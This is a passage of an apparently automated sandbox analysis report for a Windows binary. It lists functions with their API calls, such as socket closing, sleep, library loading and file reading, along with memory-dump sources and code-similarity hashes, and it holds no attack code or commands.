                                                                                                                      • Associated: 00000002.00000002.3019730804.000000000044E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3019730804.000000000045A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3019730804.0000000000474000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3019730804.00000000004FC000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3021145681.0000000000502000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3021350460.0000000000503000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_2_2_3a0000_UNK_.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: ErrorLastsend
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 1802528911-0
                                                                                                                      • Opcode ID: 64e1444d1972413c70ee936b6787de90bf70fea5c244a11da6bcc9235836449e
                                                                                                                      • Instruction ID: a908e9682275ff0dd6ea46cd5aa6a94a2e43ca366fea41059c10a7cc441f0a85
                                                                                                                      • Opcode Fuzzy Hash: 64e1444d1972413c70ee936b6787de90bf70fea5c244a11da6bcc9235836449e
                                                                                                                      • Instruction Fuzzy Hash: 49018F353002109FC711EF28D891B6AB7E9EFC9720F10812EE64A8B391CB70EC01CB90
                                                                                                                      Function 003C4274 Relevance: 3.0, APIs: 2, Instructions: 33COMMONLIBRARYCODE
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                        • Part of subcall function 003C889E: __getptd_noexit.LIBCMT ref: 003C889E
                                                                                                                      • __lock_file.LIBCMT ref: 003C42B9
                                                                                                                        • Part of subcall function 003C5A9F: __lock.LIBCMT ref: 003C5AC2
                                                                                                                      • __fclose_nolock.LIBCMT ref: 003C42C4
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000002.00000002.3019730804.00000000003A1000.00000040.00000001.01000000.00000005.sdmp, Offset: 003A0000, based on PE: true
                                                                                                                      • Associated: 00000002.00000002.3019519990.00000000003A0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3019730804.000000000044E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3019730804.000000000045A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3019730804.0000000000474000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3019730804.00000000004FC000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3021145681.0000000000502000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3021350460.0000000000503000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_2_2_3a0000_UNK_.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: __fclose_nolock__getptd_noexit__lock__lock_file
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 2800547568-0
                                                                                                                      • Opcode ID: 5fc1c201a273622e93482fe343ee9fc124cdd8cfc697767ba4dc3317ae39c367
                                                                                                                      • Instruction ID: 56df55dca938faa77861eb10728bd4dc0e8df64792fe67e3140522b2fae16a70
                                                                                                                      • Opcode Fuzzy Hash: 5fc1c201a273622e93482fe343ee9fc124cdd8cfc697767ba4dc3317ae39c367
                                                                                                                      • Instruction Fuzzy Hash: 65F090319017049AD713AB758803F6E67D06F40335F22860DB825DF1C2CB7C9D019F55
                                                                                                                      Function 003F90D3 Relevance: 3.0, APIs: 2, Instructions: 29networkCOMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                      • closesocket.WS2_32(00000000), ref: 003F90E7
                                                                                                                      • WSAGetLastError.WS2_32(00000000), ref: 003F90F3
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000002.00000002.3019730804.00000000003A1000.00000040.00000001.01000000.00000005.sdmp, Offset: 003A0000, based on PE: true
                                                                                                                      • Associated: 00000002.00000002.3019519990.00000000003A0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3019730804.000000000044E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3019730804.000000000045A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3019730804.0000000000474000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3019730804.00000000004FC000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3021145681.0000000000502000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3021350460.0000000000503000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_2_2_3a0000_UNK_.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: ErrorLastclosesocket
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 1278161333-0
                                                                                                                      • Opcode ID: ed82cda8f866af39c2b364478edba9cd038ac7a37805c7cd1049de32dd1bd970
                                                                                                                      • Instruction ID: ebd24f65ce8c0ea69b70d773e71e46f83a135e8f546537a728f33a40770d6741
                                                                                                                      • Opcode Fuzzy Hash: ed82cda8f866af39c2b364478edba9cd038ac7a37805c7cd1049de32dd1bd970
                                                                                                                      • Instruction Fuzzy Hash: 1CF03035204248AFCB12EF68D889F997FD9AF49744F04C06AF949CB262CB74D940CB95
                                                                                                                      Function 003BF55E Relevance: 3.0, APIs: 2, Instructions: 29sleeptimeCOMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                      • timeGetTime.WINMM ref: 003BF57A
                                                                                                                        • Part of subcall function 003AE1F0: PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 003AE279
                                                                                                                      • Sleep.KERNEL32(00000000), ref: 004175D3
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000002.00000002.3019730804.00000000003A1000.00000040.00000001.01000000.00000005.sdmp, Offset: 003A0000, based on PE: true
                                                                                                                      • Associated: 00000002.00000002.3019519990.00000000003A0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3019730804.000000000044E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3019730804.000000000045A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3019730804.0000000000474000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3019730804.00000000004FC000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3021145681.0000000000502000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3021350460.0000000000503000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_2_2_3a0000_UNK_.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: MessagePeekSleepTimetime
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 1792118007-0
                                                                                                                      • Opcode ID: c8b14e7b5c536f2d1edebf34d5e6a5e70c7617b385652a42c8f700bd8d30bb6c
                                                                                                                      • Instruction ID: 6bc93b3806cc412641c4ecf17d93097fb9c678ca45dbe6066faca08c4b88145a
                                                                                                                      • Opcode Fuzzy Hash: c8b14e7b5c536f2d1edebf34d5e6a5e70c7617b385652a42c8f700bd8d30bb6c
                                                                                                                      • Instruction Fuzzy Hash: 44F058712002149FD324EB69D805BA6BBE8EB49320F00002AF819CB651DF70AC008B94
                                                                                                                      Function 003B4040 Relevance: 1.7, APIs: 1, Instructions: 187COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000002.00000002.3019730804.00000000003A1000.00000040.00000001.01000000.00000005.sdmp, Offset: 003A0000, based on PE: true
                                                                                                                      • Associated: 00000002.00000002.3019519990.00000000003A0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3019730804.000000000044E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3019730804.000000000045A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3019730804.0000000000474000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3019730804.00000000004FC000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3021145681.0000000000502000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3021350460.0000000000503000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_2_2_3a0000_UNK_.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID:
                                                                                                                      • API String ID:
                                                                                                                      • Opcode ID: 9ca599920e64f453315c057626f71e299ebb78824d6afaa63b8979ad9d3f7f0c
                                                                                                                      • Instruction ID: d96d738a6a122395148269ae4e3ef859069bb1ca0e0fc0a21c3aea046341f068
                                                                                                                      • Opcode Fuzzy Hash: 9ca599920e64f453315c057626f71e299ebb78824d6afaa63b8979ad9d3f7f0c
                                                                                                                      • Instruction Fuzzy Hash: C161B774A002069FC711DF58C880ABAF7F9FF15318F148269EA15CBA92D734EC95CB95
                                                                                                                      Function 003BEF0D Relevance: 1.7, APIs: 1, Instructions: 176COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000002.00000002.3019730804.00000000003A1000.00000040.00000001.01000000.00000005.sdmp, Offset: 003A0000, based on PE: true
                                                                                                                      • Associated: 00000002.00000002.3019519990.00000000003A0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3019730804.000000000044E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3019730804.000000000045A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3019730804.0000000000474000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3019730804.00000000004FC000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3021145681.0000000000502000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3021350460.0000000000503000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_2_2_3a0000_UNK_.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID:
                                                                                                                      • API String ID:
                                                                                                                      • Opcode ID: 8a6f374e913d6e3fc62ff3bb90a79ab7e00e62726617ec2c1874b36a80e048bb
                                                                                                                      • Instruction ID: 6c0d1452b017e6de0898144ec5a71056ed7bc4a091d35412cdd32f77917d76d2
                                                                                                                      • Opcode Fuzzy Hash: 8a6f374e913d6e3fc62ff3bb90a79ab7e00e62726617ec2c1874b36a80e048bb
                                                                                                                      • Instruction Fuzzy Hash: 0D51E274600214AFCF06EF68C991EFE77AAAF49314B154069FA069F792CB34ED41DB50
                                                                                                                      Function 003A4EE9 Relevance: 1.6, APIs: 1, Instructions: 96COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                      • SetFilePointerEx.KERNEL32(?,?,00000001,00000000,00000000,?,?,00000000), ref: 003A4F8F
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000002.00000002.3019730804.00000000003A1000.00000040.00000001.01000000.00000005.sdmp, Offset: 003A0000, based on PE: true
                                                                                                                      • Associated: 00000002.00000002.3019519990.00000000003A0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3019730804.000000000044E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3019730804.000000000045A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3019730804.0000000000474000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3019730804.00000000004FC000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3021145681.0000000000502000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3021350460.0000000000503000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_2_2_3a0000_UNK_.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: FilePointer
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 973152223-0
                                                                                                                      • Opcode ID: ed43fe4eff4a2fe4a1a71789ec6598d48a7d0494b0aacb216ccc1c685c9ea40d
                                                                                                                      • Instruction ID: af027155da22fda24c05d953f71809cd109d77c130c1bb2e8e23603322432093
                                                                                                                      • Opcode Fuzzy Hash: ed43fe4eff4a2fe4a1a71789ec6598d48a7d0494b0aacb216ccc1c685c9ea40d
                                                                                                                      • Instruction Fuzzy Hash: 11315A71A10616AFCB09CF6CC580AADB7B5FF89310F15862AE81997714D7B0BDA0CB90
                                                                                                                      Function 003BF92C Relevance: 1.6, APIs: 1, Instructions: 94COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000002.00000002.3019730804.00000000003A1000.00000040.00000001.01000000.00000005.sdmp, Offset: 003A0000, based on PE: true
                                                                                                                      • Associated: 00000002.00000002.3019519990.00000000003A0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3019730804.000000000044E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3019730804.000000000045A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3019730804.0000000000474000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3019730804.00000000004FC000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3021145681.0000000000502000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3021350460.0000000000503000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_2_2_3a0000_UNK_.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: select
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 1274211008-0
                                                                                                                      • Opcode ID: 160be14eaa7db79452b6aeb530136e2f2731e3e0b6e758b09a27e7bca35b483d
                                                                                                                      • Instruction ID: cd4ec6677c91ddf866b9a813ee2525206d4f2142663162d474f8d728dd157f9f
                                                                                                                      • Opcode Fuzzy Hash: 160be14eaa7db79452b6aeb530136e2f2731e3e0b6e758b09a27e7bca35b483d
                                                                                                                      • Instruction Fuzzy Hash: 3931E970A00106EFC71ADF58D880AA9F7A5FF49308B25A2A5E549CBB55D731EDC1CBD0
                                                                                                                      Function 0041AA5A Relevance: 1.6, APIs: 1, Instructions: 88COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000002.00000002.3019730804.00000000003A1000.00000040.00000001.01000000.00000005.sdmp, Offset: 003A0000, based on PE: true
                                                                                                                      • Associated: 00000002.00000002.3019519990.00000000003A0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3019730804.000000000044E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3019730804.000000000045A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3019730804.0000000000474000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3019730804.00000000004FC000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3021145681.0000000000502000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3021350460.0000000000503000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_2_2_3a0000_UNK_.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: ClearVariant
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 1473721057-0
                                                                                                                      • Opcode ID: c9ede23ca696f428ef9a0a92b528895e2206a08879611a576bd0fad7fed57aca
                                                                                                                      • Instruction ID: b5ba693de54c06c0822b5e9b1324981743650701bbba0a2ba4f6e085471ac5eb
                                                                                                                      • Opcode Fuzzy Hash: c9ede23ca696f428ef9a0a92b528895e2206a08879611a576bd0fad7fed57aca
                                                                                                                      • Instruction Fuzzy Hash: 6C415D74504651CFEB29CF18C444B5ABBE1BF45308F19856CEA954B762C335EC85CF52
                                                                                                                      Function 003A4D67 Relevance: 1.6, APIs: 1, Instructions: 71COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000002.00000002.3019730804.00000000003A1000.00000040.00000001.01000000.00000005.sdmp, Offset: 003A0000, based on PE: true
                                                                                                                      • Associated: 00000002.00000002.3019519990.00000000003A0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3019730804.000000000044E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3019730804.000000000045A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3019730804.0000000000474000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3019730804.00000000004FC000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3021145681.0000000000502000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3021350460.0000000000503000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_2_2_3a0000_UNK_.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: _memmove
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 4104443479-0
                                                                                                                      • Opcode ID: 9f6308509cdf7f2a2ba2c89a5e41b5e5d6584e104664498f8cce402877605e32
                                                                                                                      • Instruction ID: 6d307043222833b0b7817603225b44cee80a09ddea2f965d3eaea609c142f147
                                                                                                                      • Opcode Fuzzy Hash: 9f6308509cdf7f2a2ba2c89a5e41b5e5d6584e104664498f8cce402877605e32
                                                                                                                      • Instruction Fuzzy Hash: 3D210270600B08EBCB149F51E940AA97FF8FB97340F22842EE496D6051EB70D5D0C759
                                                                                                                      Function 003AD805 Relevance: 1.6, APIs: 1, Instructions: 64COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000002.00000002.3019730804.00000000003A1000.00000040.00000001.01000000.00000005.sdmp, Offset: 003A0000, based on PE: true
                                                                                                                      • Associated: 00000002.00000002.3019519990.00000000003A0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3019730804.000000000044E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3019730804.000000000045A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3019730804.0000000000474000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3019730804.00000000004FC000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3021145681.0000000000502000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3021350460.0000000000503000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_2_2_3a0000_UNK_.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: _memmove
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 4104443479-0
                                                                                                                      • Opcode ID: 850a3e34ffcf0575de9322bf5b98585c373294fd89485bbbcd9ce223ec0d444b
                                                                                                                      • Instruction ID: c35f9c9b4a10b3d7f9882c1c3ca714c2e63ab506ca6eb28642201daa072ac8a0
                                                                                                                      • Opcode Fuzzy Hash: 850a3e34ffcf0575de9322bf5b98585c373294fd89485bbbcd9ce223ec0d444b
                                                                                                                      • Instruction Fuzzy Hash: 24114C75600601DFC725DF28D581A16F7E9FF49314720842EE88ACBA61E732E841CB50
                                                                                                                      Function 003A3F9B Relevance: 1.6, APIs: 1, Instructions: 63libraryCOMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                        • Part of subcall function 003A3F5D: FreeLibrary.KERNEL32(00000000,?), ref: 003A3F90
                                                                                                                        • Part of subcall function 003C4129: __wfsopen.LIBCMT ref: 003C4134
                                                                                                                      • LoadLibraryExW.KERNEL32(00000001,00000000,00000002,?,?,?,?,003A34E2,?,00000001), ref: 003A3FCD
                                                                                                                        • Part of subcall function 003A3E78: FreeLibrary.KERNEL32(00000000), ref: 003A3EAB
                                                                                                                        • Part of subcall function 003A4010: _memmove.LIBCMT ref: 003A405A
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000002.00000002.3019730804.00000000003A1000.00000040.00000001.01000000.00000005.sdmp, Offset: 003A0000, based on PE: true
                                                                                                                      • Associated: 00000002.00000002.3019519990.00000000003A0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3019730804.000000000044E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3019730804.000000000045A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3019730804.0000000000474000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3019730804.00000000004FC000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3021145681.0000000000502000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3021350460.0000000000503000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_2_2_3a0000_UNK_.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: Library$Free$Load__wfsopen_memmove
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 1396898556-0
                                                                                                                      • Opcode ID: 2d302133428bbe2f35f2b112e6390cb854e6817e81b2b7e36597ba82a277a285
                                                                                                                      • Instruction ID: 1be0a60d6b40323e8e31c1dde97da1cd3e3f0b2ed3d61759f487dadf235ea468
                                                                                                                      • Opcode Fuzzy Hash: 2d302133428bbe2f35f2b112e6390cb854e6817e81b2b7e36597ba82a277a285
                                                                                                                      • Instruction Fuzzy Hash: D911E332610205AACB22BB64DC03F9E77A9DF81700F208829F542EA1C1DBB49E41AB54
                                                                                                                      Function 0041AB2A Relevance: 1.6, APIs: 1, Instructions: 62COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000002.00000002.3019730804.00000000003A1000.00000040.00000001.01000000.00000005.sdmp, Offset: 003A0000, based on PE: true
                                                                                                                      • Associated: 00000002.00000002.3019519990.00000000003A0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3019730804.000000000044E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3019730804.000000000045A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3019730804.0000000000474000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3019730804.00000000004FC000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3021145681.0000000000502000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3021350460.0000000000503000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_2_2_3a0000_UNK_.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: ClearVariant
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 1473721057-0
                                                                                                                      • Opcode ID: e3d435e1439e11f757040b9c5a820c35f7275b47ec3d1ef97b8ab3b36940d49e
                                                                                                                      • Instruction ID: ff5b69344d849598f561ffc2aa64cabdb1cdf8b918a7fbd6b67d84716f177ace
                                                                                                                      • Opcode Fuzzy Hash: e3d435e1439e11f757040b9c5a820c35f7275b47ec3d1ef97b8ab3b36940d49e
                                                                                                                      • Instruction Fuzzy Hash: 31212774508641CFE72ADF68C444B5BBBE1BF89308F15496CEA964BA32C731E885CF52
                                                                                                                      Function 004010E5 Relevance: 1.6, APIs: 1, Instructions: 57libraryCOMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000002.00000002.3019730804.00000000003A1000.00000040.00000001.01000000.00000005.sdmp, Offset: 003A0000, based on PE: true
                                                                                                                      • Associated: 00000002.00000002.3019519990.00000000003A0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3019730804.000000000044E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3019730804.000000000045A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3019730804.0000000000474000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3019730804.00000000004FC000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3021145681.0000000000502000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3021350460.0000000000503000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_2_2_3a0000_UNK_.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: LibraryLoad
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 1029625771-0
                                                                                                                      • Opcode ID: a2924769b10aadd6922bb075493e8d070a54630f8c62da7c8f66a8d023fef1a0
                                                                                                                      • Instruction ID: 06e9266bf133038df3f3d24447509ea1f7523fe0c59bead827ead6444097d183
                                                                                                                      • Opcode Fuzzy Hash: a2924769b10aadd6922bb075493e8d070a54630f8c62da7c8f66a8d023fef1a0
                                                                                                                      • Instruction Fuzzy Hash: B3118F363012159FDB25DF19C4809DAB7A5FF4D720B05817AFE459F3A1CB34AC418B95
                                                                                                                      Function 003A4CA0 Relevance: 1.6, APIs: 1, Instructions: 51fileCOMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                      • ReadFile.KERNEL32(?,?,00010000,?,00000000,?,00000000,00000000,?,003A4E69,00000000,00010000,00000000,00000000,00000000,00000000), ref: 003A4CF7
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000002.00000002.3019730804.00000000003A1000.00000040.00000001.01000000.00000005.sdmp, Offset: 003A0000, based on PE: true
                                                                                                                      • Associated: 00000002.00000002.3019519990.00000000003A0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3019730804.000000000044E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3019730804.000000000045A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3019730804.0000000000474000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3019730804.00000000004FC000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3021145681.0000000000502000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3021350460.0000000000503000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_2_2_3a0000_UNK_.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: FileRead
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 2738559852-0
                                                                                                                      • Opcode ID: 3faa2159fe6593a4c912d103f12e9d173b3838b5c29c965dd5d4bf61ce851696
                                                                                                                      • Instruction ID: 24b6326865a3d96cc92cf17c10cc7fb294c397806a2394b71e468e8dc8347d64
